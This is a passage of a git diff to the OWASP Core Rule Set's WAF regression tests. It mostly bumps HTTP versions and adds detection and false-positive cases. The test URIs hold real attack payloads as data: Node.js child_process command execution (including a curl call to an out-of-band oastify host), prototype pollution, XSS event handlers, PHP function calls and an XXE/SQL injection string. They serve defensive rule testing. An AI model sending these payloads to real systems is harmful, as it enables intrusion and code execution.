+          uri: "/get?foo=%24%20%7B%20%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [933135]
+  - test_id: 9
+    desc: "${a}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%7Ba%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
index 7d50b91e3..23836ecaf 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=php://stdout"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933140]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
index c05319b5f..8a64f570f 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "lifeforms, azurit"
+  author: "lifeforms, azurit, Esad Cetiner"
 rule_id: 933150
 tests:
   - test_id: 1
@@ -552,8 +552,7 @@ tests:
             expect_ids: [933150]
   - test_id: 33
     desc: |
-      PHP function call with multiple whitespaces.
-      payload: fopen  (blah)
+      False positive with filename matching `fopen`
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -563,8 +562,26 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: GET
           port: 80
-          uri: "/get?foo=fopen%20%20%28blah%29"
+          uri: "/get?foo=RootAndLeafOpenCamera.jpg"
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [933150]
+            no_expect_ids: [933150]
+  - test_id: 34
+    desc: |
+      SEO Framework false positive
+      matching 'strip_tags' in 'title_strip_tags'
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?foo=autodescription-site-settings[title_strip_tags]"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [933150]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
index 8c561628e..aee522901 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "lifeforms, Franziska Bühler, Max Leske, azurit"
+  author: "lifeforms, Franziska Bühler, Max Leske, azurit, Esad Cetiner"
 rule_id: 933160
 tests:
   - test_id: 1
@@ -676,3 +676,90 @@ tests:
         output:
           log:
             expect_ids: [933160]
+  - test_id: 38
+    desc: |
+      Positive test: eval('runExploit()')
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+          method: GET
+          port: 80
+          uri: "/get?933160-38=eval%28%27runExploit%28%29%27%29"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [933160]
+  - test_id: 39
+    desc: |
+      PHP function call with multiple whitespaces.
+      payload: fopen  (blah)
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?foo=fopen%20%20%28blah%29"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [933160]
+  - test_id: 40
+    desc: |
+      False positive with filename matching `fopen`
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?foo=RootAndLeafOpenCamera.jpg"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [933160]
+  - test_id: 41
+    desc: |
+      SEO Framework false positive
+      matching 'strip_tags' in 'title_strip_tags'
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?foo=autodescription-site-settings[title_strip_tags]"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [933160]
+  - test_id: 42
+    desc: |
+      Block strip_tags function
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?foo=strip_tags()"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [933160]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
index 4dfd1dc63..ad66713c3 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=_%24%24ND_FUNC%24%24_"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=__js_function"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -47,7 +47,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=eval%28String.fromCharCode"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -63,7 +63,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=function%28%29+%7B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -79,7 +79,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=new+Function+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -95,7 +95,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=this.constructor.constructor"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -111,7 +111,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=module.exports%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -127,7 +127,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=XyQkTkRfRlVOQyQkXwo="
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -143,7 +143,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=XyQkTkRfRlVOQyQkXwo="
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -159,7 +159,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=process.env"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -175,7 +175,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=console.info(1)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -191,7 +191,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=c%5Cu006fnsole.info(1)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -207,7 +207,7 @@ tests:
           method: GET
           port: 80
           uri: '/get?foo=process["env"]'
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -223,7 +223,7 @@ tests:
           method: GET
           port: 80
           uri: '/get?foo=console["info"](1)'
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -239,7 +239,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=console.info.call(this,1)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -255,7 +255,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=process."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [934100]
@@ -271,7 +271,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=console."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [934100]
@@ -287,7 +287,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -303,7 +303,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -319,7 +319,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=process%5Breq.query.a"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -335,7 +335,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=require%5Breq.query.a"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -351,7 +351,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=process%5BmainModule"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -367,7 +367,7 @@ tests:
           method: GET
           port: 80
           uri: /get?foo=require("child_process").exec('whoami')
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -438,7 +438,7 @@ tests:
             Cookie: 'test_cookie=_$$ND_FUNC$$_function()'
           method: GET
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -455,7 +455,7 @@ tests:
             Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()'
           method: GET
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -472,7 +472,7 @@ tests:
             Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK'
           method: GET
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -489,7 +489,7 @@ tests:
             Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK'
           method: GET
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
@@ -506,7 +506,7 @@ tests:
             Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK'
           method: GET
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934100]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
index fbb8fbcfb..7b14a1758 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934101]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934101]
@@ -47,7 +47,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934101]
@@ -63,7 +63,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=require(\"child_process\").exec('whoami')"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934101]
@@ -79,7 +79,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934101]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
index 42ff4adc5..18a939eb1 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=proto"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [934130]
@@ -32,7 +32,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}}
         output:
@@ -50,7 +50,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?__proto__[test]=test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -66,7 +66,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?__proto__.test=test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -82,7 +82,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?constructor.prototype.test=test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -98,7 +98,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?constructor.prototype.%20test=test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -114,7 +114,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?__proto__[context]=<img/src/onerror%3dalert(1)>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -130,7 +130,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -146,7 +146,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -162,7 +162,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?__proto__[jquery]=x"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -178,7 +178,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934130]
@@ -216,3 +216,19 @@ tests:
         output:
           log:
             expect_ids: [934130]
+  - test_id: 14
+    desc: "Detect example payload [constructor][prototype]"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?x=x&a[constructor][prototype]=image&a[constructor][prototype][onerror]=a"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [934130]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
index 080d6ab13..55a28d3bd 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?x=@{[system+whoami]}"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934140]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
index 60ed9998e..0de34270e 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?x=Process.spawn(%22id%22)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934150]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
index aed2d48cb..4339284b9 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=while%20(foo)%20is%20bar."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [934160]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!false)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -47,7 +47,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!-0);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -63,7 +63,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!%2B0);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -79,7 +79,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!0);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -95,7 +95,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!-0);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -111,7 +111,7 @@ tests:
           method: GET
           port: 80
           uri: '/get?eval=while(!"");'
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -127,7 +127,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!'');"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -143,7 +143,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!``);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -159,7 +159,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(true);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -175,7 +175,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(Infinity);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -191,7 +191,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(-Infinity);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -207,7 +207,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(%2BInfinity);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -223,7 +223,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(-1);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -239,7 +239,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(%2B1);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -255,7 +255,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(new%20Date);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -271,7 +271,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(this);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -287,7 +287,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(String);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -303,7 +303,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!true);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [934160]
@@ -319,7 +319,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!!{});"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -335,7 +335,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!![]);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -351,7 +351,7 @@ tests:
           method: GET
           port: 80
           uri: '/get?eval=while(!!"");'
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -367,7 +367,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!!'');"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -383,7 +383,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!!``);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -399,7 +399,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!null)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -415,7 +415,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!undefined)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -431,7 +431,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while(!NaN)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
@@ -447,7 +447,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?eval=while((true)))"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [934160]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
index d80795be4..c97656f89 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
@@ -46,7 +46,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php/%3Csvg/onload=alert()"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941101]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
index 46415eef9..116a95370 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
@@ -15,7 +15,7 @@ tests:
           method: POST
           port: 80
           uri: "/post?%20%20onload%3d%20=vardata"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941120]
@@ -31,7 +31,7 @@ tests:
           method: POST
           port: 80
           uri: "/post?%20%20onabcdefgh%3d%20=vardata"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941120]
@@ -47,12 +47,12 @@ tests:
           method: POST
           port: 80
           uri: "/post?%20%20onab%3d%20=vardata"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [941120]
   - test_id: 4
-    desc: "XSS Filter - Category 2: Event Handler Vector"
+    desc: "XSS Filter - Category 2: Event Handler Vector - now a positive test after updating lenght to 50"
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -63,10 +63,10 @@ tests:
           method: POST
           port: 80
           uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [941120]
+            expect_ids: [941120]
   - test_id: 5
     desc: "XSS Filter - Category 2: Event Handler Vector"
     stages:
@@ -96,7 +96,39 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php/%3Csvg/onload=alert()"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941120]
+  - test_id: 7
+    desc: "Test longer event name onwebkitplaybacktargetavailabilitychanged"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?%20%20onwebkitplaybacktargetavailabilitychanged%3d%20=vardata"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [941120]
+  - test_id: 8
+    desc: "Negative test: word longer than 50 chars - onthisisaverylongwordthathasmorethanfiftycharacters (51 chars)"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get?%20%20onthisisaverylongwordthathasmorethanfiftycharacters%20=vardata"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [941120]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
index c6190136a..3cdcd61cb 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "csanders-git, Christian Folini, azurit"
+  author: "csanders-git, Christian Folini, azurit, Max Leske"
 rule_id: 941130
 tests:
   - test_id: 1
@@ -32,7 +32,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % lbsod SYSTEM \"http://im8vx9fw5e2ibzctphxn9vauwl2m0joncfz5nu.example'||'foo.bar/\">%lbsod;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -49,7 +49,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
